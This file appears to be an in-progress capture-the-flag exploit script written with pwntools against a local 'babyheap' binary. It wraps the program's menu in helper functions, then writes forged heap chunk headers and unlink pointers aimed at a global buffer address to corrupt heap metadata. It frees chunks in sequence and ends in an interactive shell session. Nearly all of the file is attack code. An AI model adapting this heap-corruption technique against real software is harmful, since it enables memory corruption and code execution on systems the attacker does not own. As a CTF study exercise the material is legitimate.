from pwn import * 
from LibcSearcher import * 

p=process('./babyheap')
elf=ELF('./babyheap')
def show(index,length):
    p.recvuntil(b'\noption> ')
    p.sendline(b'1')
    p.recvuntil(b'Input index:\n')
    p.sendline(str(index).encode())
    p.recvuntil(b'Input length:\n')
    p.sendline(str(length).encode())
def create(index,length,content):
    p.recvuntil(b'\noption> ')
    p.sendline(b'2')
    p.recvuntil(b'Input index:\n')
    p.sendline(str(index).encode())
    p.recvuntil(b'Input length (16~80):\n')
    p.sendline(str(length).encode())
    p.recvuntil(b'Input content:\n')
    p.sendline(content)
def delete(index):
    p.recvuntil(b'\noption> ')
    p.sendline(b'3')
    p.recvuntil(b'Input index:\n')
    p.sendline(str(index).encode())
def edit(index,content):
    p.recvuntil(b'\noption> ')
    p.sendline(b'4')
    p.recvuntil(b'Input index:\n')
    p.sendline(str(index).encode())
    p.recvuntil(b'Input content:\n')
    p.sendline(content)
buf_addr=0x4040c0
create(0,0x30,b'aaaa')
create(1,0x30,b'bbbb')
create(2,0x20,b'cccc')
create(3,0x50,b'dddd')
create(4,0x50,b'eeee')
create(5,0x40,b'ffff')
# create(6,0x40,b'gggg')
payload=b'f'*0x20+p64(0x100)+p64(0x110)
edit(2,payload)
payload2=p64(0)+p64(0x101)
payload2+=p64(buf_addr-0x18+8)+p64(buf_addr-0x10+8)
edit(0,payload2)
# edit(5,b'g'*0x40+p64(0x100))
context.log_level = 'debug' 
delete(4)
delete(5)
delete(1)
delete(2)
# delete(6)
pause()
delete(3)
pause()
show(1,0x20)
create(6,0x10,b'gggg')
p.interactive()
